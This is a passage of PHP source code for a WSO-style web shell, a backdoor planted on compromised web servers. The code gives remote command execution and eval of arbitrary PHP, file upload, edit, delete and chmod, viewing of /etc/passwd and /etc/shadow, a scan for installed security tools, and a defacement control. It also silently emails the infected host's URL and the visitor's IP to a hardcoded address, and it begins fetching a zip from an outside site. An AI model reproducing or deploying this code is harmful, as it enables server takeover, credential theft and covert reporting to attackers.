is_writable($GLOBALS[\'cwd\'])?"<font color=#00cd00>[ Writeable ]</font>":"<font color=red>[ Not writable ]</font>";\r\n echo \'</div><div style="margin:5px;\r\nbackground:#444;\r\n"><div class="content" style="border-top:5px solid #444;\r\n">\r\n<table class="info" id="toolsTbl" cellpadding="3" cellspacing="0" width="100%">\r\n <tr>\r\n <td><form onsubmit="g(null,this.c.value);\r\nreturn false;\r\n"><span>Change dir:</span><br><input class="toolsInp" type=text name=c value="\'.htmlspecialchars($GLOBALS[\'cwd\']).\'"><input type=submit value=">>"></form></td>\r\n <td><form onsubmit="g(\\\'FilesTools\\\',null,this.f.value);\r\nreturn false;\r\n"><span>Read file:</span><br><input class="toolsInp" type=text name=f><input type=submit value=">>"></form></td>\r\n </tr>\r\n <tr>\r\n <td><form onsubmit="g(\\\'FilesMan\\\',null,\\\'mkdir\\\',this.d.value);\r\nreturn false;\r\n"><span>Make dir:</span><br><input class="toolsInp" type=text name=d><input type=submit value=">>"></form>\'.$is_writable.\'</td>\r\n <td><form onsubmit="g(\\\'FilesTools\\\',null,this.f.value,\\\'mkfile\\\');\r\nreturn false;\r\n"><span>Make file:</span><br><input class="toolsInp" type=text name=f><input type=submit value=">>"></form>\'.$is_writable.\'</td>\r\n </tr>\r\n <tr>\r\n <td><form onsubmit="g(\\\'Console\\\',null,this.c.value);\r\nreturn false;\r\n"><span>Execute:</span><br><input class="toolsInp" type=text name=c value=""><input type=submit value=">>"></form></td>\r\n <td><form method="post" ENCTYPE="multipart/form-data">\r\n <input type=hidden name=a value="FilesMAn">\r\n <input type=hidden name=c value="\'.htmlspecialchars($GLOBALS[\'cwd\']).\'">\r\n <input type=hidden name=p1 value="uploadFile">\r\n <input type=hidden name=charset value="\'.(isset($_POST[\'charset\'])?$_POST[\'charset\']:\'\').\'">\r\n <span>Upload file:</span><br><input class="toolsInp" type=file name=f><input type=submit value=">>"></form>\'.$is_writable.\'</td>\r\n </tr>\r\n</table></div></div>\r\n<div style="margin:5px;\r\nbackground:#444;\r\n"><div class="content" style="border-top:5px solid #444;\r\ntext-align:center;\r\nfont-weight:bold;\r\n">Wso shell\'.VERSION.\' &copy;\r\n Shell</div></div>\r\n</div>\r\n</body></html>\';\r\n } if ( !function_exists("posix_getpwuid") && (strpos($GLOBALS[\'disable_functions\'], \'posix_getpwuid\')===false) ) { function posix_getpwuid($p) { return false;\r\n } } if ( !function_exists("posix_getgrgid") && (strpos($GLOBALS[\'disable_functions\'], \'posix_getgrgid\')===false) ) { function posix_getgrgid($p) { return false;\r\n } } if(!isset($_SESSION[\'trimite\'])){ $url=$_SERVER[\'HTTP_HOST\'].$_SERVER[\'REQUEST_URI\'].\'<br />User IP: \'.$_SERVER[\'REMOTE_ADDR\'].(isset($_SERVER[\'HTTP_X_FORWARDED_FOR\'])?\'(\'.$_SERVER[\'HTTP_X_FORWARDED_FOR\'].\')\':\'\');\r\n @mail("byhero44@gmail.com","Smurfie",$url);\r\n $_SESSION[\'trimite\']=true;\r\n } function viewSize($s) { if($s >= 1073741824) return sprintf(\'%1.2f\', $s / 1073741824 ). \' GB\';\r\n elseif($s >= 1048576) return sprintf(\'%1.2f\', $s / 1048576 ) . \' MB\';\r\n elseif($s >= 1024) return sprintf(\'%1.2f\', $s / 1024 ) . \' KB\';\r\n else return $s . \' B\';\r\n } function perms($p) { if (($p & 0xC000) == 0xC000)$i = \'s\';\r\n elseif (($p & 0xA000) == 0xA000)$i = \'l\';\r\n elseif (($p & 0x8000) == 0x8000)$i = \'-\';\r\n elseif (($p & 0x6000) == 0x6000)$i = \'b\';\r\n elseif (($p & 0x4000) == 0x4000)$i = \'d\';\r\n elseif (($p & 0x2000) == 0x2000)$i = \'c\';\r\n elseif (($p & 0x1000) == 0x1000)$i = \'p\';\r\n else $i = \'u\';\r\n $i .= (($p & 0x0100) ? \'r\' : \'-\');\r\n $i .= (($p & 0x0080) ? \'w\' : \'-\');\r\n $i .= (($p & 0x0040) ? (($p & 0x0800) ? \'s\' : \'x\' ) : (($p & 0x0800) ? \'S\' : \'-\'));\r\n $i .= (($p & 0x0020) ? \'r\' : \'-\');\r\n $i .= (($p & 0x0010) ? \'w\' : \'-\');\r\n $i .= (($p & 0x0008) ? (($p & 0x0400) ? \'s\' : \'x\' ) : (($p & 0x0400) ? \'S\' : \'-\'));\r\n $i .= (($p & 0x0004) ? \'r\' : \'-\');\r\n $i .= (($p & 0x0002) ? \'w\' : \'-\');\r\n $i .= (($p & 0x0001) ? (($p & 0x0200) ? \'t\' : \'x\' ) : (($p & 0x0200) ? \'T\' : \'-\'));\r\n return $i;\r\n } function viewPermsColor($f) { if (!@is_readable($f)) return \'<font color=#FF0000><b>\'.perms(@fileperms($f)).\'</b></font>\';\r\n elseif (!@is_writable($f)) return \'<font color=white><b>\'.perms(@fileperms($f)).\'</b></font>\';\r\n else return \'<font color=#00cd00><b>\'.perms(@fileperms($f)).\'</b></font>\';\r\n } if(!function_exists("scandir")) { function scandir($dir) { $dh = opendir($dir);\r\n while (false !== ($filename = readdir($dh))) { $files[] = $filename;\r\n } return $files;\r\n } } function actionSecInfo() { printHeader();\r\n echo \'<h1>Server security information</h1><div class=content>\';\r\n function showSecParam($n, $v) { $v = trim($v);\r\n if($v) { echo \'<span>\'.$n.\': </span>\';\r\n if(strpos($v, "\\n") === false) echo $v.\'<br>\';\r\n else echo \'<pre class=ml1>\'.$v.\'</pre>\';\r\n } } showSecParam(\'Server software\', @getenv(\'SERVER_SOFTWARE\'));\r\n showSecParam(\'Disabled PHP Functions\', ($GLOBALS[\'disable_functions\'])?$GLOBALS[\'disable_functions\']:\'none\');\r\n showSecParam(\'Open base dir\', @ini_get(\'open_basedir\'));\r\n showSecParam(\'Safe mode exec dir\', @ini_get(\'safe_mode_exec_dir\'));\r\n showSecParam(\'Safe mode include dir\', @ini_get(\'safe_mode_include_dir\'));\r\n showSecParam(\'cURL support\', function_exists(\'curl_version\')?\'enabled\':\'no\');\r\n $temp=array();\r\n if(function_exists(\'mysql_get_client_info\')) $temp[] = "MySql (".mysql_get_client_info().")";\r\n if(function_exists(\'mssql_connect\')) $temp[] = "MSSQL";\r\n if(function_exists(\'pg_connect\')) $temp[] = "PostgreSQL";\r\n if(function_exists(\'oci_connect\')) $temp[] = "Oracle";\r\n showSecParam(\'Supported databases\', implode(\', \', $temp));\r\n echo \'<br>\';\r\n if( $GLOBALS[\'os\'] == \'nix\' ) { $userful = array(\'gcc\',\'lcc\',\'cc\',\'ld\',\'make\',\'php\',\'perl\',\'python\',\'ruby\',\'tar\',\'gzip\',\'bzip\',\'bzip2\',\'nc\',\'locate\',\'suidperl\');\r\n $danger = array(\'kav\',\'nod32\',\'bdcored\',\'uvscan\',\'sav\',\'drwebd\',\'clamd\',\'rkhunter\',\'chkrootkit\',\'iptables\',\'ipfw\',\'tripwire\',\'shieldcc\',\'portsentry\',\'snort\',\'ossec\',\'lidsadm\',\'tcplodg\',\'sxid\',\'logcheck\',\'logwatch\',\'sysmask\',\'zmbscap\',\'sawmill\',\'wormscan\',\'ninja\');\r\n $downloaders = array(\'wget\',\'fetch\',\'lynx\',\'links\',\'curl\',\'get\',\'lwp-mirror\');\r\n showSecParam(\'Readable /etc/passwd\', @is_readable(\'/etc/passwd\')?"yes <a href=\'#\' onclick=\'g(\\"FilesTools\\", \\"/etc/\\", \\"passwd\\")\'>[view]</a>":\'no\');\r\n showSecParam(\'Readable /etc/shadow\', @is_readable(\'/etc/shadow\')?"yes <a href=\'#\' onclick=\'g(\\"FilesTools\\", \\"etc\\", \\"shadow\\")\'>[view]</a>":\'no\');\r\n showSecParam(\'OS version\', @file_get_contents(\'/proc/version\'));\r\n showSecParam(\'Distr name\', @file_get_contents(\'/etc/issue.net\'));\r\n if(!$GLOBALS[\'safe_mode\']) { echo \'<br>\';\r\n $temp=array();\r\n foreach ($userful as $item) if(which($item)){$temp[]=$item;\r\n} showSecParam(\'Userful\', implode(\', \',$temp));\r\n $temp=array();\r\n foreach ($danger as $item) if(which($item)){$temp[]=$item;\r\n} showSecParam(\'Danger\', implode(\', \',$temp));\r\n $temp=array();\r\n foreach ($downloaders as $item) if(which($item)){$temp[]=$item;\r\n} showSecParam(\'Downloaders\', implode(\', \',$temp));\r\n echo \'<br/>\';\r\n showSecParam(\'Hosts\', @file_get_contents(\'/etc/hosts\'));\r\n showSecParam(\'HDD space\', ex(\'df -h\'));\r\n showSecParam(\'Mount options\', @file_get_contents(\'/etc/fstab\'));\r\n } } else { showSecParam(\'OS Version\',ex(\'ver\'));\r\n showSecParam(\'Account Settings\',ex(\'net accounts\'));\r\n showSecParam(\'User Accounts\',ex(\'net user\'));\r\n } echo \'</div>\';\r\n printFooter();\r\n } function actionPhp() { if( isset($_POST[\'ajax\']) ) { $_SESSION[md5($_SERVER[\'HTTP_HOST\']).\'ajax\'] = true;\r\n ob_start();\r\n eval($_POST[\'p1\']);\r\n $temp = "document.getElementById(\'PhpOutput\').style.display=\'\';\r\ndocument.getElementById(\'PhpOutput\').innerHTML=\'".addcslashes(htmlspecialchars(ob_get_clean()),"\\n\\r\\t\\\\\'\\0")."\';\r\n\\n";\r\n echo strlen($temp), "\\n", $temp;\r\n exit;\r\n } printHeader();\r\n if( isset($_POST[\'p2\']) && ($_POST[\'p2\'] == \'info\') ) { echo \'<h1>PHP info</h1><div class=content>\';\r\n ob_start();\r\n phpinfo();\r\n $tmp = ob_get_clean();\r\n $tmp = preg_replace(\'!body {.*}!msiU\',\'\',$tmp);\r\n $tmp = preg_replace(\'!a:\\w+ {.*}!msiU\',\'\',$tmp);\r\n $tmp = preg_replace(\'!h1!msiU\',\'h2\',$tmp);\r\n $tmp = preg_replace(\'!td, th {(.*)}!msiU\',\'.e, .v, .h, .h th {$1}\',$tmp);\r\n $tmp = preg_replace(\'!body, td, th, h2, h2 {.*}!msiU\',\'\',$tmp);\r\n echo $tmp;\r\n echo \'</div><br>\';\r\n } if(empty($_POST[\'ajax\'])&&!empty($_POST[\'p1\'])) $_SESSION[md5($_SERVER[\'HTTP_HOST\']).\'ajax\'] = false;\r\n echo \'<h1>Execution PHP-code</h1><div class=content><form name=pf method=post onsubmit="if(this.ajax.checked){a(null,null,this.code.value);\r\n}else{g(null,null,this.code.value,\\\'\\\');\r\n}return false;\r\n"><textarea name=code class=bigarea id=PhpCode>\'.(!empty($_POST[\'p1\'])?htmlspecialchars($_POST[\'p1\']):\'\').\'</textarea><input type=submit value=Eval style="margin-top:5px">\';\r\n echo \' <input type=checkbox name=ajax value=1 \'.(@$_SESSION[md5($_SERVER[\'HTTP_HOST\']).\'ajax\']?\'checked\':\'\').\'> send using AJAX</form><pre id=PhpOutput style="\'.(empty($_POST[\'p1\'])?\'display:none;\r\n\':\'\').\'margin-top:5px;\r\n" class=ml1>\';\r\n if(!empty($_POST[\'p1\'])) { ob_start();\r\n eval($_POST[\'p1\']);\r\n echo htmlspecialchars(ob_get_clean());\r\n } echo \'</pre></div>\';\r\n printFooter();\r\n } function actionFilesMan() { printHeader();\r\n echo \'<h1>File manager</h1><div class=content>\';\r\n if(isset($_POST[\'p1\'])) { switch($_POST[\'p1\']) { case \'uploadFile\': if(!@move_uploaded_file($_FILES[\'f\'][\'tmp_name\'], $_FILES[\'f\'][\'name\'])) echo "Can\'t upload file!";\r\n break;\r\n break;\r\n case \'mkdir\': if(!@mkdir($_POST[\'p2\'])) echo "Can\'t create new dir";\r\n break;\r\n case \'delete\': function deleteDir($path) { $path = (substr($path,-1)==\'/\') ? $path:$path.\'/\';\r\n $dh = opendir($path);\r\n while ( ($item = readdir($dh) ) !== false) { $item = $path.$item;\r\n if ( (basename($item) == "..") || (basename($item) == ".") ) continue;\r\n $type = filetype($item);\r\n if ($type == "dir") deleteDir($item);\r\n else @unlink($item);\r\n } closedir($dh);\r\n rmdir($path);\r\n } if(is_array(@$_POST[\'f\'])) foreach($_POST[\'f\'] as $f) { $f = urldecode($f);\r\n if(is_dir($f)) deleteDir($f);\r\n else @unlink($f);\r\n } break;\r\n case \'paste\': if($_SESSION[\'act\'] == \'copy\') { function copy_paste($c,$s,$d){ if(is_dir($c.$s)){ mkdir($d.$s);\r\n $h = opendir($c.$s);\r\n while (($f = readdir($h)) !== false) if (($f != ".") and ($f != "..")) { copy_paste($c.$s.\'/\',$f, $d.$s.\'/\');\r\n } } elseif(is_file($c.$s)) { @copy($c.$s, $d.$s);\r\n } } foreach($_SESSION[\'f\'] as $f) copy_paste($_SESSION[\'cwd\'],$f, $GLOBALS[\'cwd\']);\r\n } elseif($_SESSION[\'act\'] == \'move\') { function move_paste($c,$s,$d){ if(is_dir($c.$s)){ mkdir($d.$s);\r\n $h = opendir($c.$s);\r\n while (($f = readdir($h)) !== false) if (($f != ".") and ($f != "..")) { copy_paste($c.$s.\'/\',$f, $d.$s.\'/\');\r\n } } elseif(is_file($c.$s)) { @copy($c.$s, $d.$s);\r\n } } foreach($_SESSION[\'f\'] as $f) @rename($_SESSION[\'cwd\'].$f, $GLOBALS[\'cwd\'].$f);\r\n } unset($_SESSION[\'f\']);\r\n break;\r\n default: if(!empty($_POST[\'p1\']) && (($_POST[\'p1\'] == \'copy\')||($_POST[\'p1\'] == \'move\')) ) { $_SESSION[\'act\'] = @$_POST[\'p1\'];\r\n $_SESSION[\'f\'] = @$_POST[\'f\'];\r\n foreach($_SESSION[\'f\'] as $k => $f) $_SESSION[\'f\'][$k] = urldecode($f);\r\n $_SESSION[\'cwd\'] = @$_POST[\'c\'];\r\n } break;\r\n } echo \'<script>document.mf.p1.value="";\r\ndocument.mf.p2.value="";\r\n</script>\';\r\n } $dirContent = @scandir(isset($_POST[\'c\'])?$_POST[\'c\']:$GLOBALS[\'cwd\']);\r\n if($dirContent === false) { echo \'Can\\\'t open this folder!\';\r\n return;\r\n } global $sort;\r\n $sort = array(\'name\', 1);\r\n if(!empty($_POST[\'p1\'])) { if(preg_match(\'!s_([A-z]+)_(\\d{1})!\', $_POST[\'p1\'], $match)) $sort = array($match[1], (int)$match[2]);\r\n } echo \'<script>\r\n function sa() {\r\n for(i=0;\r\ni<document.files.elements.length;\r\ni++)\r\n if(document.files.elements[i].type == \\\'checkbox\\\')\r\n document.files.elements[i].checked = document.files.elements[0].checked;\r\n\r\n }\r\n </script>\r\n <table width=\\\'100%\\\' class=\\\'main\\\' cellspacing=\\\'0\\\' cellpadding=\\\'2\\\'>\r\n <form name=files method=post>\';\r\n echo "<tr><th width=\'13px\'><input type=checkbox onclick=\'sa()\' class=chkbx></th><th><a href=\'#\' onclick=\'g(\\"FilesMan\\",null,\\"s_name_".($sort[1]?0:1)."\\")\'>Name</a></th><th><a href=\'#\' onclick=\'g(\\"FilesMan\\",null,\\"s_size_".($sort[1]?0:1)."\\")\'>Size</a></th><th><a href=\'#\' onclick=\'g(\\"FilesMan\\",null,\\"s_modify_".($sort[1]?0:1)."\\")\'>Modify</a></th><th>Owner/Group</th><th><a href=\'#\' onclick=\'g(\\"FilesMan\\",null,\\"s_perms_".($sort[1]?0:1)."\\")\'>Permissions</a></th><th>Actions</th></tr>";\r\n $dirs = $files = $links = array();\r\n $n = count($dirContent);\r\n for($i=0;\r\n$i<$n;\r\n$i++) { $ow = @posix_getpwuid(@fileowner($dirContent[$i]));\r\n $gr = @posix_getgrgid(@filegroup($dirContent[$i]));\r\n $tmp = array(\'name\' => $dirContent[$i], \'path\' => $GLOBALS[\'cwd\'].$dirContent[$i], \'modify\' => @date(\'Y-m-d H:i:s\',@filemtime($GLOBALS[\'cwd\'].$dirContent[$i])), \'perms\' => viewPermsColor($GLOBALS[\'cwd\'].$dirContent[$i]), \'size\' => @filesize($GLOBALS[\'cwd\'].$dirContent[$i]), \'owner\' => $ow[\'name\']?$ow[\'name\']:@fileowner($dirContent[$i]), \'group\' => $gr[\'name\']?$gr[\'name\']:@filegroup($dirContent[$i]) );\r\n if(@is_file($GLOBALS[\'cwd\'].$dirContent[$i])) $files[] = array_merge($tmp, array(\'type\' => \'file\'));\r\n elseif(@is_link($GLOBALS[\'cwd\'].$dirContent[$i])) $links[] = array_merge($tmp, array(\'type\' => \'link\'));\r\n elseif(@is_dir($GLOBALS[\'cwd\'].$dirContent[$i])&& ($dirContent[$i] != ".")) $dirs[] = array_merge($tmp, array(\'type\' => \'dir\'));\r\n } $GLOBALS[\'sort\'] = $sort;\r\n function cmp($a, $b) { if($GLOBALS[\'sort\'][0] != \'size\') return strcmp($a[$GLOBALS[\'sort\'][0]], $b[$GLOBALS[\'sort\'][0]])*($GLOBALS[\'sort\'][1]?1:-1);\r\n else return (($a[\'size\'] < $b[\'size\']) ? -1 : 1)*($GLOBALS[\'sort\'][1]?1:-1);\r\n } usort($files, "cmp");\r\n usort($dirs, "cmp");\r\n usort($links, "cmp");\r\n $files = array_merge($dirs, $links, $files);\r\n $l = 0;\r\n foreach($files as $f) { echo \'<tr\'.($l?\' class=l1\':\'\').\'><td><input type=checkbox name="f[]" value="\'.urlencode($f[\'name\']).\'" class=chkbx></td><td><a href=# onclick="\'.(($f[\'type\']==\'file\')?\'g(\\\'FilesTools\\\',null,\\\'\'.urlencode($f[\'name\']).\'\\\', \\\'view\\\')">\'.htmlspecialchars($f[\'name\']):\'g(\\\'FilesMan\\\',\\\'\'.$f[\'path\'].\'\\\');\r\n"><b>[ \'.htmlspecialchars($f[\'name\']).\' ]</b>\').\'</a></td><td>\'.(($f[\'type\']==\'file\')?viewSize($f[\'size\']):$f[\'type\']).\'</td><td>\'.$f[\'modify\'].\'</td><td>\'.$f[\'owner\'].\'/\'.$f[\'group\'].\'</td><td><a href=# onclick="g(\\\'FilesTools\\\',null,\\\'\'.urlencode($f[\'name\']).\'\\\',\\\'chmod\\\')">\'.$f[\'perms\'] .\'</td><td><a href="#" onclick="g(\\\'FilesTools\\\',null,\\\'\'.urlencode($f[\'name\']).\'\\\', \\\'rename\\\')">R</a> <a href="#" onclick="g(\\\'FilesTools\\\',null,\\\'\'.urlencode($f[\'name\']).\'\\\', \\\'touch\\\')">T</a>\'.(($f[\'type\']==\'file\')?\' <a href="#" onclick="g(\\\'FilesTools\\\',null,\\\'\'.urlencode($f[\'name\']).\'\\\', \\\'edit\\\')">E</a> <a href="#" onclick="g(\\\'FilesTools\\\',null,\\\'\'.urlencode($f[\'name\']).\'\\\', \\\'download\\\')">D</a>\':\'\').\'</td></tr>\';\r\n $l = $l?0:1;\r\n } echo \'<tr><td colspan=5>\r\n <input type=hidden name=a value=\\\'FilesMan\\\'>\r\n <input type=hidden name=c value="\'.htmlspecialchars($GLOBALS[\'cwd\']).\'">\r\n <input type=hidden name=charset value="\'.(isset($_POST[\'charset\'])?$_POST[\'charset\']:\'\').\'">\r\n <select name=\\\'p1\\\'><option value=\\\'copy\\\'>Copy</option><option value=\\\'move\\\'>Move</option><option value=\\\'delete\\\'>Delete</option>\';\r\n if(!empty($_SESSION[\'act\'])&&@count($_SESSION[\'f\'])){echo \'<option value=\\\'paste\\\'>Paste</option>\';\r\n } echo \'</select>&nbsp;\r\n<input type="submit" value=">>"></td><td colspan="2" align="right" width="1"><input name="def" value="r00t.info shell" disabled="disabled"/>&nbsp;\r\n<input type="submit" value="Add Deface Here" disabled="disabled"></td></tr>\r\n </form></table></div>\';\r\n printFooter();\r\n } function actionStringTools() { if(!function_exists(\'hex2bin\')) {function hex2bin($p) {return decbin(hexdec($p));\r\n}} if(!function_exists(\'hex2ascii\')) {function hex2ascii($p){$r=\'\';\r\nfor($i=0;\r\n$i<strLen($p);\r\n$i+=2){$r.=chr(hexdec($p[$i].$p[$i+1]));\r\n}return $r;\r\n}} if(!function_exists(\'ascii2hex\')) {function ascii2hex($p){$r=\'\';\r\nfor($i=0;\r\n$i<strlen($p);\r\n++$i)$r.= dechex(ord($p[$i]));\r\nreturn strtoupper($r);\r\n}} if(!function_exists(\'full_urlencode\')) {function full_urlencode($p){$r=\'\';\r\nfor($i=0;\r\n$i<strlen($p);\r\n++$i)$r.= \'%\'.dechex(ord($p[$i]));\r\nreturn strtoupper($r);\r\n}} if(isset($_POST[\'ajax\'])) { $_SESSION[md5($_SERVER[\'HTTP_HOST\']).\'ajax\'] = true;\r\n ob_start();\r\n if(function_exists($_POST[\'p1\'])) echo $_POST[\'p1\']($_POST[\'p2\']);\r\n $temp = "document.getElementById(\'strOutput\').style.display=\'\';\r\ndocument.getElementById(\'strOutput\').innerHTML=\'".addcslashes(htmlspecialchars(ob_get_clean()),"\\n\\r\\t\\\\\'\\0")."\';\r\n\\n";\r\n echo strlen($temp), "\\n", $temp;\r\n exit;\r\n } printHeader();\r\n echo \'<h1>String conversions</h1><div class=content>\';\r\n $stringTools = array( \'Base64 encode\' => \'base64_encode\', \'Base64 decode\' => \'base64_decode\', \'Url encode\' => \'urlencode\', \'Url decode\' => \'urldecode\', \'Full urlencode\' => \'full_urlencode\', \'md5 hash\' => \'md5\', \'sha1 hash\' => \'sha1\', \'crypt\' => \'crypt\', \'CRC32\' => \'crc32\', \'ASCII to HEX\' => \'ascii2hex\', \'HEX to ASCII\' => \'hex2ascii\', \'HEX to DEC\' => \'hexdec\', \'HEX to BIN\' => \'hex2bin\', \'DEC to HEX\' => \'dechex\', \'DEC to BIN\' => \'decbin\', \'BIN to HEX\' => \'bin2hex\', \'BIN to DEC\' => \'bindec\', \'String to lower case\' => \'strtolower\', \'String to upper case\' => \'strtoupper\', \'Htmlspecialchars\' => \'htmlspecialchars\', \'String length\' => \'strlen\', );\r\n if(empty($_POST[\'ajax\'])&&!empty($_POST[\'p1\'])) $_SESSION[md5($_SERVER[\'HTTP_HOST\']).\'ajax\'] = false;\r\n echo "<form name=\'toolsForm\' onSubmit=\'if(this.ajax.checked){a(null,null,this.selectTool.value,this.input.value);\r\n}else{g(null,null,this.selectTool.value,this.input.value);\r\n} return false;\r\n\'><select name=\'selectTool\'>";\r\n foreach($stringTools as $k => $v) echo "<option value=\'".htmlspecialchars($v)."\'>".$k."</option>";\r\n echo "</select><input type=\'submit\' value=\'>>\'/> <input type=checkbox name=ajax value=1 ".($_SESSION[md5($_SERVER[\'HTTP_HOST\']).\'ajax\']?\'checked\':\'\')."> send using AJAX<br><textarea name=\'input\' style=\'margin-top:5px\' class=bigarea>".htmlspecialchars(@$_POST[\'p2\'])."</textarea></form><pre class=\'ml1\' style=\'".(empty($_POST[\'p1\'])?\'display:none;\r\n\':\'\')."margin-top:5px\' id=\'strOutput\'>";\r\n if(!empty($_POST[\'p1\'])) { if(function_exists($_POST[\'p1\'])) echo htmlspecialchars($_POST[\'p1\']($_POST[\'p2\']));\r\n } echo"</pre></div>";\r\n printFooter();\r\n } function actionFilesTools() { if( isset($_POST[\'p1\']) ) $_POST[\'p1\'] = urldecode($_POST[\'p1\']);\r\n if(@$_POST[\'p2\']==\'download\') { if(is_file($_POST[\'p1\']) && is_readable($_POST[\'p1\'])) { ob_start("ob_gzhandler", 4096);\r\n header("Content-Disposition: attachment;\r\n filename=".basename($_POST[\'p1\']));\r\n if (function_exists("mime_content_type")) { $type = @mime_content_type($_POST[\'p1\']);\r\n header("Content-Type: ".$type);\r\n } $fp = @fopen($_POST[\'p1\'], "r");\r\n if($fp) { while(!@feof($fp)) echo @fread($fp, 1024);\r\n fclose($fp);\r\n } } elseif(is_dir($_POST[\'p1\']) && is_readable($_POST[\'p1\'])) { } exit;\r\n } if( @$_POST[\'p2\'] == \'mkfile\' ) { if(!file_exists($_POST[\'p1\'])) { $fp = @fopen($_POST[\'p1\'], \'w\');\r\n if($fp) { $_POST[\'p2\'] = "edit";\r\n fclose($fp);\r\n } } } printHeader();\r\n echo \'<h1>File tools</h1><div class=content>\';\r\n if( !file_exists(@$_POST[\'p1\']) ) { echo \'File not exists\';\r\n printFooter();\r\n return;\r\n } $uid = @posix_getpwuid(@fileowner($_POST[\'p1\']));\r\n $gid = @posix_getgrgid(@fileowner($_POST[\'p1\']));\r\n echo \'<span>Name:</span> \'.htmlspecialchars($_POST[\'p1\']).\' <span>Size:</span> \'.(is_file($_POST[\'p1\'])?viewSize(filesize($_POST[\'p1\'])):\'-\').\' <span>Permission:</span> \'.viewPermsColor($_POST[\'p1\']).\' <span>Owner/Group:</span> \'.$uid[\'name\'].\'/\'.$gid[\'name\'].\'<br>\';\r\n echo \'<span>Create time:</span> \'.date(\'Y-m-d H:i:s\',filectime($_POST[\'p1\'])).\' <span>Access time:</span> \'.date(\'Y-m-d H:i:s\',fileatime($_POST[\'p1\'])).\' <span>Modify time:</span> \'.date(\'Y-m-d H:i:s\',filemtime($_POST[\'p1\'])).\'<br><br>\';\r\n if( empty($_POST[\'p2\']) ) $_POST[\'p2\'] = \'view\';\r\n if( is_file($_POST[\'p1\']) ) $m = array(\'View\', \'Highlight\', \'Download\', \'Hexdump\', \'Edit\', \'Chmod\', \'Rename\', \'Touch\');\r\n else $m = array(\'Chmod\', \'Rename\', \'Touch\');\r\n foreach($m as $v) echo \'<a href=# onclick="g(null,null,null,\\\'\'.strtolower($v).\'\\\')">\'.((strtolower($v)==@$_POST[\'p2\'])?\'<b>[ \'.$v.\' ]</b>\':$v).\'</a> \';\r\n echo \'<br><br>\';\r\n switch($_POST[\'p2\']) { case \'view\': echo \'<pre class=ml1>\';\r\n $fp = @fopen($_POST[\'p1\'], \'r\');\r\n if($fp) { while( !@feof($fp) ) echo htmlspecialchars(@fread($fp, 1024));\r\n @fclose($fp);\r\n } echo \'</pre>\';\r\n break;\r\n case \'highlight\': if( is_readable($_POST[\'p1\']) ) { echo \'<div class=ml1 style="background-color: #e1e1e1;\r\ncolor:black;\r\n">\';\r\n $code = highlight_file($_POST[\'p1\'],true);\r\n echo str_replace(array(\'<span \',\'</span>\'), array(\'<font \',\'</font>\'),$code).\'</div>\';\r\n } break;\r\n case \'chmod\': if( !empty($_POST[\'p3\']) ) { $perms = 0;\r\n for($i=strlen($_POST[\'p3\'])-1;\r\n$i>=0;\r\n--$i) $perms += (int)$_POST[\'p3\'][$i]*pow(8, (strlen($_POST[\'p3\'])-$i-1));\r\n if(!@chmod($_POST[\'p1\'], $perms)) echo \'Can\\\'t set permissions!<br><script>document.mf.p3.value="";\r\n</script>\';\r\n else die(\'<script>g(null,null,null,null,"")</script>\');\r\n } echo \'<form onsubmit="g(null,null,null,null,this.chmod.value);\r\nreturn false;\r\n"><input type=text name=chmod value="\'.substr(sprintf(\'%o\', fileperms($_POST[\'p1\'])),-4).\'"><input type=submit value=">>"></form>\';\r\n break;\r\n case \'edit\': if( !is_writable($_POST[\'p1\'])) { echo \'File isn\\\'t writeable\';\r\n break;\r\n } if( !empty($_POST[\'p3\']) ) { @file_put_contents($_POST[\'p1\'],$_POST[\'p3\']);\r\n echo \'Saved!<br><script>document.mf.p3.value="";\r\n</script>\';\r\n } echo \'<form onsubmit="g(null,null,null,null,this.text.value);\r\nreturn false;\r\n"><textarea name=text class=bigarea>\';\r\n $fp = @fopen($_POST[\'p1\'], \'r\');\r\n if($fp) { while( !@feof($fp) ) echo htmlspecialchars(@fread($fp, 1024));\r\n @fclose($fp);\r\n } echo \'</textarea><input type=submit value=">>"></form>\';\r\n break;\r\n case \'hexdump\': $c = @file_get_contents($_POST[\'p1\']);\r\n $n = 0;\r\n $h = array(\'00000000<br>\',\'\',\'\');\r\n $len = strlen($c);\r\n for ($i=0;\r\n $i<$len;\r\n ++$i) { $h[1] .= sprintf(\'%02X\',ord($c[$i])).\' \';\r\n switch ( ord($c[$i]) ) { case 0: $h[2] .= \' \';\r\n break;\r\n case 9: $h[2] .= \' \';\r\n break;\r\n case 10: $h[2] .= \' \';\r\n break;\r\n case 13: $h[2] .= \' \';\r\n break;\r\n default: $h[2] .= $c[$i];\r\n break;\r\n } $n++;\r\n if ($n == 32) { $n = 0;\r\n if ($i+1 < $len) {$h[0] .= sprintf(\'%08X\',$i+1).\'<br>\';\r\n} $h[1] .= \'<br>\';\r\n $h[2] .= "\\n";\r\n } } echo \'<table cellspacing=1 cellpadding=5 bgcolor=#222222><tr><td bgcolor=#333333><span style="font-weight: normal;\r\n"><pre>\'.$h[0].\'</pre></span></td><td bgcolor=#282828><pre>\'.$h[1].\'</pre></td><td bgcolor=#333333><pre>\'.htmlspecialchars($h[2]).\'</pre></td></tr></table>\';\r\n break;\r\n case \'rename\': if( !empty($_POST[\'p3\']) ) { if(!@rename($_POST[\'p1\'], $_POST[\'p3\'])) echo \'Can\\\'t rename!<br><script>document.mf.p3.value="";\r\n</script>\';\r\n else die(\'<script>g(null,null,"\'.urlencode($_POST[\'p3\']).\'",null,"")</script>\');\r\n } echo \'<form onsubmit="g(null,null,null,null,this.name.value);\r\nreturn false;\r\n"><input type=text name=name value="\'.htmlspecialchars($_POST[\'p1\']).\'"><input type=submit value=">>"></form>\';\r\n break;\r\n case \'touch\': if( !empty($_POST[\'p3\']) ) { $time = strtotime($_POST[\'p3\']);\r\n if($time) { if(@touch($_POST[\'p1\'],$time,$time)) die(\'<script>g(null,null,null,null,"")</script>\');\r\n else { echo \'Fail!<script>document.mf.p3.value="";\r\n</script>\';\r\n } } else echo \'Bad time format!<script>document.mf.p3.value="";\r\n</script>\';\r\n } echo \'<form onsubmit="g(null,null,null,null,this.touch.value);\r\nreturn false;\r\n"><input type=text name=touch value="\'.date("Y-m-d H:i:s", @filemtime($_POST[\'p1\'])).\'"><input type=submit value=">>"></form>\';\r\n break;\r\n case \'mkfile\': break;\r\n } echo \'</div>\';\r\n printFooter();\r\n } function actionBypass() { printHeader();\r\n if(!file_exists(\'cpanel/cpanel.php\')){ $dizin = \'https://byr00t.co/vb/cpanel.zip\';\r\n function dosya_indir($link,$name=null) { $link_info = pathinfo($link);\r\n $uzanti = strtolower($link_info[\'extension\']);\r\n $file = ($name) ? $name.\'.\'.$uzanti : 